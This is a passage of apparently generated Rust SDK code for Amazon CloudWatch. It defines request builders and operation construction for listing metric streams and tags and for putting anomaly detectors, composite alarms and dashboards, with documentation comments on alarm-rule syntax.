/// A builder for [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) next_token: std::option::Option<std::string::String>,
pub(crate) max_results: std::option::Option<i32>,
}
impl Builder {
/// <p>Include this value, if it was returned by the previous call, to get the next set of metric streams.</p>
pub fn next_token(mut self, input: impl Into<std::string::String>) -> Self {
self.next_token = Some(input.into());
self
}
pub fn set_next_token(mut self, input: std::option::Option<std::string::String>) -> Self {
self.next_token = input;
self
}
/// <p>The maximum number of results to return in one operation.</p>
pub fn max_results(mut self, input: i32) -> Self {
self.max_results = Some(input);
self
}
pub fn set_max_results(mut self, input: std::option::Option<i32>) -> Self {
self.max_results = input;
self
}
/// Consumes the builder and constructs a [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListMetricStreamsInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListMetricStreamsInput {
next_token: self.next_token,
max_results: self.max_results,
})
}
}
}
#[doc(hidden)]
pub type ListMetricStreamsInputOperationOutputAlias = crate::operation::ListMetricStreams;
#[doc(hidden)]
pub type ListMetricStreamsInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListMetricStreamsInput {
/// Consumes the builder and constructs an Operation<[`ListMetricStreams`](crate::operation::ListMetricStreams)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListMetricStreams,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_metric_streams(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListMetricStreams::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListMetricStreams",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListMetricStreamsInput`](crate::input::ListMetricStreamsInput)
pub fn builder() -> crate::input::list_metric_streams_input::Builder {
crate::input::list_metric_streams_input::Builder::default()
}
}
/// See [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub mod list_tags_for_resource_input {
/// A builder for [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) resource_arn: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The ARN of the CloudWatch resource that you want to view tags for.</p>
/// <p>The ARN format of an alarm is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:alarm:<i>alarm-name</i>
/// </code>
/// </p>
/// <p>The ARN format of a Contributor Insights rule is
/// <code>arn:aws:cloudwatch:<i>Region</i>:<i>account-id</i>:insight-rule:<i>insight-rule-name</i>
/// </code>
/// </p>
/// <p>For more information about ARN format, see <a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/list_amazoncloudwatch.html#amazoncloudwatch-resources-for-iam-policies"> Resource
/// Types Defined by Amazon CloudWatch</a> in the <i>Amazon Web Services General
/// Reference</i>.</p>
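        /// <p>A sketch of composing an alarm ARN in the documented format (the Region,
        /// account ID, and alarm name are placeholders):</p>
        ///
        /// ```ignore
        /// let arn = format!(
        ///     "arn:aws:cloudwatch:{}:{}:alarm:{}",
        ///     "us-east-1", "123456789012", "my-alarm",
        /// );
        /// let builder = builder.resource_arn(arn);
        /// ```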
pub fn resource_arn(mut self, input: impl Into<std::string::String>) -> Self {
self.resource_arn = Some(input.into());
self
}
pub fn set_resource_arn(mut self, input: std::option::Option<std::string::String>) -> Self {
self.resource_arn = input;
self
}
/// Consumes the builder and constructs a [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::ListTagsForResourceInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::ListTagsForResourceInput {
resource_arn: self.resource_arn,
})
}
}
}
#[doc(hidden)]
pub type ListTagsForResourceInputOperationOutputAlias = crate::operation::ListTagsForResource;
#[doc(hidden)]
pub type ListTagsForResourceInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl ListTagsForResourceInput {
/// Consumes the builder and constructs an Operation<[`ListTagsForResource`](crate::operation::ListTagsForResource)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::ListTagsForResource,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_list_tags_for_resource(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::ListTagsForResource::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"ListTagsForResource",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`ListTagsForResourceInput`](crate::input::ListTagsForResourceInput)
pub fn builder() -> crate::input::list_tags_for_resource_input::Builder {
crate::input::list_tags_for_resource_input::Builder::default()
}
}
/// See [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub mod put_anomaly_detector_input {
/// A builder for [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) namespace: std::option::Option<std::string::String>,
pub(crate) metric_name: std::option::Option<std::string::String>,
pub(crate) dimensions: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
pub(crate) stat: std::option::Option<std::string::String>,
pub(crate) configuration: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
}
impl Builder {
/// <p>The namespace of the metric to create the anomaly detection model for.</p>
pub fn namespace(mut self, input: impl Into<std::string::String>) -> Self {
self.namespace = Some(input.into());
self
}
pub fn set_namespace(mut self, input: std::option::Option<std::string::String>) -> Self {
self.namespace = input;
self
}
/// <p>The name of the metric to create the anomaly detection model for.</p>
pub fn metric_name(mut self, input: impl Into<std::string::String>) -> Self {
self.metric_name = Some(input.into());
self
}
pub fn set_metric_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.metric_name = input;
self
}
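        /// Appends an item to `dimensions`.
        ///
        /// To override the contents of this collection use [`set_dimensions`](Self::set_dimensions).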
pub fn dimensions(mut self, input: impl Into<crate::model::Dimension>) -> Self {
let mut v = self.dimensions.unwrap_or_default();
v.push(input.into());
self.dimensions = Some(v);
self
}
pub fn set_dimensions(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Dimension>>,
) -> Self {
self.dimensions = input;
self
}
/// <p>The statistic to use for the metric and the anomaly detection model.</p>
pub fn stat(mut self, input: impl Into<std::string::String>) -> Self {
self.stat = Some(input.into());
self
}
pub fn set_stat(mut self, input: std::option::Option<std::string::String>) -> Self {
self.stat = input;
self
}
/// <p>The configuration specifies details about how the
/// anomaly detection model is to be trained, including
/// time ranges to exclude when training and updating the model.
/// You can specify as many as 10 time ranges.</p>
/// <p>The configuration can also include the time zone to use for
/// the metric.</p>
pub fn configuration(mut self, input: crate::model::AnomalyDetectorConfiguration) -> Self {
self.configuration = Some(input);
self
}
pub fn set_configuration(
mut self,
input: std::option::Option<crate::model::AnomalyDetectorConfiguration>,
) -> Self {
self.configuration = input;
self
}
/// Consumes the builder and constructs a [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutAnomalyDetectorInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutAnomalyDetectorInput {
namespace: self.namespace,
metric_name: self.metric_name,
dimensions: self.dimensions,
stat: self.stat,
configuration: self.configuration,
})
}
}
}
#[doc(hidden)]
pub type PutAnomalyDetectorInputOperationOutputAlias = crate::operation::PutAnomalyDetector;
#[doc(hidden)]
pub type PutAnomalyDetectorInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutAnomalyDetectorInput {
/// Consumes the builder and constructs an Operation<[`PutAnomalyDetector`](crate::operation::PutAnomalyDetector)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutAnomalyDetector,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_anomaly_detector(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutAnomalyDetector::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutAnomalyDetector",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutAnomalyDetectorInput`](crate::input::PutAnomalyDetectorInput)
pub fn builder() -> crate::input::put_anomaly_detector_input::Builder {
crate::input::put_anomaly_detector_input::Builder::default()
}
}
/// See [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub mod put_composite_alarm_input {
/// A builder for [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) actions_enabled: std::option::Option<bool>,
pub(crate) alarm_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) alarm_description: std::option::Option<std::string::String>,
pub(crate) alarm_name: std::option::Option<std::string::String>,
pub(crate) alarm_rule: std::option::Option<std::string::String>,
pub(crate) insufficient_data_actions:
std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) ok_actions: std::option::Option<std::vec::Vec<std::string::String>>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
impl Builder {
/// <p>Indicates whether actions should be executed during any changes to the alarm state of the composite alarm. The default is
/// <code>TRUE</code>.</p>
pub fn actions_enabled(mut self, input: bool) -> Self {
self.actions_enabled = Some(input);
self
}
pub fn set_actions_enabled(mut self, input: std::option::Option<bool>) -> Self {
self.actions_enabled = input;
self
}
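        /// Appends an item to `alarm_actions`.
        ///
        /// To override the contents of this collection use [`set_alarm_actions`](Self::set_alarm_actions).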
pub fn alarm_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.alarm_actions.unwrap_or_default();
v.push(input.into());
self.alarm_actions = Some(v);
self
}
pub fn set_alarm_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.alarm_actions = input;
self
}
/// <p>The description for the composite alarm.</p>
pub fn alarm_description(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_description = Some(input.into());
self
}
pub fn set_alarm_description(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.alarm_description = input;
self
}
/// <p>The name for the composite alarm. This name must be unique within the Region.</p>
pub fn alarm_name(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_name = Some(input.into());
self
}
pub fn set_alarm_name(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_name = input;
self
}
        /// <p>An expression that specifies which other alarms are to be evaluated to determine this
        /// composite alarm's state. For each alarm that you reference, you designate a function that
        /// specifies whether that alarm needs to be in ALARM state, OK state, or INSUFFICIENT_DATA state. You
        /// can use operators (AND, OR, and NOT) to combine multiple functions in a single expression. You can use parentheses to logically group the
        /// functions in your expression.</p>
/// <p>You can use either alarm names or ARNs to reference the other alarms that are to be evaluated.</p>
/// <p>Functions can include the following:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>OK("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in OK state.</p>
/// </li>
/// <li>
/// <p>
/// <code>INSUFFICIENT_DATA("<i>alarm-name</i> or <i>alarm-ARN</i>")</code> is TRUE if the named
/// alarm is in INSUFFICIENT_DATA state.</p>
/// </li>
/// <li>
/// <p>
/// <code>TRUE</code> always evaluates to TRUE.</p>
/// </li>
/// <li>
/// <p>
/// <code>FALSE</code> always evaluates to FALSE.</p>
/// </li>
/// </ul>
/// <p>TRUE and FALSE are useful for testing a complex <code>AlarmRule</code> structure, and
/// for testing your alarm actions.</p>
/// <p>Alarm names specified in <code>AlarmRule</code> can be surrounded with double-quotes ("), but do not have to be.</p>
/// <p>The following
/// are some examples of <code>AlarmRule</code>:</p>
/// <ul>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND ALARM(DiskReadOpsTooHigh)</code> specifies that the composite alarm goes into ALARM state only
/// if both CPUUtilizationTooHigh and DiskReadOpsTooHigh alarms are in ALARM state.</p>
/// </li>
/// <li>
/// <p>
/// <code>ALARM(CPUUtilizationTooHigh) AND NOT ALARM(DeploymentInProgress)</code>
/// specifies that the alarm goes to ALARM state if CPUUtilizationTooHigh is in ALARM state
/// and DeploymentInProgress is not in ALARM state. This example reduces
/// alarm noise during a known deployment window.</p>
/// </li>
/// <li>
/// <p>
/// <code>(ALARM(CPUUtilizationTooHigh) OR ALARM(DiskReadOpsTooHigh)) AND OK(NetworkOutTooHigh)</code> goes into ALARM
/// state if CPUUtilizationTooHigh OR DiskReadOpsTooHigh is in ALARM state, and if NetworkOutTooHigh is in OK state.
/// This provides another example of using a composite alarm to prevent noise. This rule ensures that you are not notified with an
/// alarm action on high CPU or disk usage if a known network problem is also occurring.</p>
/// </li>
/// </ul>
/// <p>The <code>AlarmRule</code> can specify as many as 100
/// "children" alarms. The <code>AlarmRule</code> expression can have as many as 500 elements. Elements
/// are child alarms, TRUE or FALSE statements, and
/// parentheses.</p>
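        /// <p>As a sketch (assuming this crate is consumed as <code>aws_sdk_cloudwatch</code>,
        /// and with hypothetical alarm names), a deployment-aware rule could be wired up
        /// like this:</p>
        ///
        /// ```ignore
        /// let input = aws_sdk_cloudwatch::input::PutCompositeAlarmInput::builder()
        ///     .alarm_name("ServiceDegraded")
        ///     .alarm_rule("ALARM(HighLatency) AND NOT ALARM(DeploymentInProgress)")
        ///     .build()?;
        /// ```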
pub fn alarm_rule(mut self, input: impl Into<std::string::String>) -> Self {
self.alarm_rule = Some(input.into());
self
}
pub fn set_alarm_rule(mut self, input: std::option::Option<std::string::String>) -> Self {
self.alarm_rule = input;
self
}
        /// Appends an item to `insufficient_data_actions`; use `set_insufficient_data_actions` to replace the whole list.
        pub fn insufficient_data_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.insufficient_data_actions.unwrap_or_default();
v.push(input.into());
self.insufficient_data_actions = Some(v);
self
}
pub fn set_insufficient_data_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.insufficient_data_actions = input;
self
}
        /// Appends an item to `ok_actions`; use `set_ok_actions` to replace the whole list.
        pub fn ok_actions(mut self, input: impl Into<std::string::String>) -> Self {
let mut v = self.ok_actions.unwrap_or_default();
v.push(input.into());
self.ok_actions = Some(v);
self
}
pub fn set_ok_actions(
mut self,
input: std::option::Option<std::vec::Vec<std::string::String>>,
) -> Self {
self.ok_actions = input;
self
}
        /// Appends an item to `tags`; use `set_tags` to replace the whole list.
        pub fn tags(mut self, input: impl Into<crate::model::Tag>) -> Self {
let mut v = self.tags.unwrap_or_default();
v.push(input.into());
self.tags = Some(v);
self
}
pub fn set_tags(
mut self,
input: std::option::Option<std::vec::Vec<crate::model::Tag>>,
) -> Self {
self.tags = input;
self
}
/// Consumes the builder and constructs a [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub fn build(
self,
) -> std::result::Result<
crate::input::PutCompositeAlarmInput,
smithy_http::operation::BuildError,
> {
Ok(crate::input::PutCompositeAlarmInput {
actions_enabled: self.actions_enabled,
alarm_actions: self.alarm_actions,
alarm_description: self.alarm_description,
alarm_name: self.alarm_name,
alarm_rule: self.alarm_rule,
insufficient_data_actions: self.insufficient_data_actions,
ok_actions: self.ok_actions,
tags: self.tags,
})
}
}
}
#[doc(hidden)]
pub type PutCompositeAlarmInputOperationOutputAlias = crate::operation::PutCompositeAlarm;
#[doc(hidden)]
pub type PutCompositeAlarmInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutCompositeAlarmInput {
/// Consumes the builder and constructs an Operation<[`PutCompositeAlarm`](crate::operation::PutCompositeAlarm)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutCompositeAlarm,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body = crate::operation_ser::serialize_operation_put_composite_alarm(&self)
.map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutCompositeAlarm::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutCompositeAlarm",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutCompositeAlarmInput`](crate::input::PutCompositeAlarmInput)
pub fn builder() -> crate::input::put_composite_alarm_input::Builder {
crate::input::put_composite_alarm_input::Builder::default()
}
}
/// See [`PutDashboardInput`](crate::input::PutDashboardInput)
pub mod put_dashboard_input {
/// A builder for [`PutDashboardInput`](crate::input::PutDashboardInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) dashboard_name: std::option::Option<std::string::String>,
pub(crate) dashboard_body: std::option::Option<std::string::String>,
}
impl Builder {
/// <p>The name of the dashboard. If a dashboard with this name already exists, this call modifies that dashboard, replacing
/// its current contents. Otherwise, a new dashboard is created. The maximum length is 255, and valid characters are
/// A-Z, a-z, 0-9, "-", and "_". This parameter is required.</p>
pub fn dashboard_name(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_name = Some(input.into());
self
}
pub fn set_dashboard_name(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_name = input;
self
}
/// <p>The detailed information about the dashboard in JSON format, including the widgets to include and their location
/// on the dashboard. This parameter is required.</p>
/// <p>For more information about the syntax,
/// see <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/CloudWatch-Dashboard-Body-Structure.html">Dashboard Body Structure and Syntax</a>.</p>
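        /// <p>A minimal sketch of a dashboard body (a single hypothetical text widget),
        /// assuming this crate is consumed as <code>aws_sdk_cloudwatch</code>:</p>
        ///
        /// ```ignore
        /// let body = r#"{"widgets":[{"type":"text","x":0,"y":0,"width":6,"height":3,
        ///     "properties":{"markdown":"# Service overview"}}]}"#;
        /// let input = aws_sdk_cloudwatch::input::PutDashboardInput::builder()
        ///     .dashboard_name("my-dashboard")
        ///     .dashboard_body(body)
        ///     .build()?;
        /// ```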
pub fn dashboard_body(mut self, input: impl Into<std::string::String>) -> Self {
self.dashboard_body = Some(input.into());
self
}
pub fn set_dashboard_body(
mut self,
input: std::option::Option<std::string::String>,
) -> Self {
self.dashboard_body = input;
self
}
/// Consumes the builder and constructs a [`PutDashboardInput`](crate::input::PutDashboardInput)
pub fn build(
self,
) -> std::result::Result<crate::input::PutDashboardInput, smithy_http::operation::BuildError>
{
Ok(crate::input::PutDashboardInput {
dashboard_name: self.dashboard_name,
dashboard_body: self.dashboard_body,
})
}
}
}
#[doc(hidden)]
pub type PutDashboardInputOperationOutputAlias = crate::operation::PutDashboard;
#[doc(hidden)]
pub type PutDashboardInputOperationRetryAlias = aws_http::AwsErrorRetryPolicy;
impl PutDashboardInput {
/// Consumes the builder and constructs an Operation<[`PutDashboard`](crate::operation::PutDashboard)>
#[allow(clippy::let_and_return)]
pub fn make_operation(
&self,
_config: &crate::config::Config,
) -> std::result::Result<
smithy_http::operation::Operation<
crate::operation::PutDashboard,
aws_http::AwsErrorRetryPolicy,
>,
smithy_http::operation::BuildError,
> {
Ok({
let request = self.request_builder_base()?;
let body =
crate::operation_ser::serialize_operation_put_dashboard(&self).map_err(|err| {
smithy_http::operation::BuildError::SerializationError(err.into())
})?;
let request = Self::assemble(request, body);
#[allow(unused_mut)]
let mut request =
smithy_http::operation::Request::new(request.map(smithy_http::body::SdkBody::from));
request
.config_mut()
.insert(aws_http::user_agent::AwsUserAgent::new_from_environment(
crate::API_METADATA.clone(),
));
#[allow(unused_mut)]
let mut signing_config = aws_sig_auth::signer::OperationSigningConfig::default_config();
request.config_mut().insert(signing_config);
request
.config_mut()
.insert(aws_types::SigningService::from_static(
_config.signing_service(),
));
aws_endpoint::set_endpoint_resolver(
&mut request.config_mut(),
_config.endpoint_resolver.clone(),
);
if let Some(region) = &_config.region {
request.config_mut().insert(region.clone());
}
aws_auth::set_provider(
&mut request.config_mut(),
_config.credentials_provider.clone(),
);
let op = smithy_http::operation::Operation::new(
request,
crate::operation::PutDashboard::new(),
)
.with_metadata(smithy_http::operation::Metadata::new(
"PutDashboard",
"cloudwatch",
));
let op = op.with_retry_policy(aws_http::AwsErrorRetryPolicy::new());
op
})
}
fn uri_base(&self, output: &mut String) -> Result<(), smithy_http::operation::BuildError> {
write!(output, "/").expect("formatting should succeed");
Ok(())
}
#[allow(clippy::unnecessary_wraps)]
fn update_http_builder(
&self,
builder: http::request::Builder,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let mut uri = String::new();
self.uri_base(&mut uri)?;
Ok(builder.method("POST").uri(uri))
}
#[allow(clippy::unnecessary_wraps)]
fn request_builder_base(
&self,
) -> std::result::Result<http::request::Builder, smithy_http::operation::BuildError> {
let builder = http::request::Builder::new();
let builder = builder.header("Content-Type", "application/x-www-form-urlencoded");
self.update_http_builder(builder)
}
fn assemble(
mut builder: http::request::Builder,
body: smithy_http::body::SdkBody,
) -> http::request::Request<smithy_http::body::SdkBody> {
if let Some(content_length) = body.content_length() {
builder = builder.header(http::header::CONTENT_LENGTH, content_length)
}
builder.body(body).expect("should be valid request")
}
/// Creates a new builder-style object to manufacture [`PutDashboardInput`](crate::input::PutDashboardInput)
pub fn builder() -> crate::input::put_dashboard_input::Builder {
crate::input::put_dashboard_input::Builder::default()
}
}
/// See [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
pub mod put_insight_rule_input {
/// A builder for [`PutInsightRuleInput`](crate::input::PutInsightRuleInput)
#[non_exhaustive]
#[derive(std::default::Default, std::clone::Clone, std::cmp::PartialEq, std::fmt::Debug)]
pub struct Builder {
pub(crate) rule_name: std::option::Option<std::string::String>,
pub(crate) rule_state: std::option::Option<std::string::String>,
pub(crate) rule_definition: std::option::Option<std::string::String>,
pub(crate) tags: std::option::Option<std::vec::Vec<crate::model::Tag>>,
}
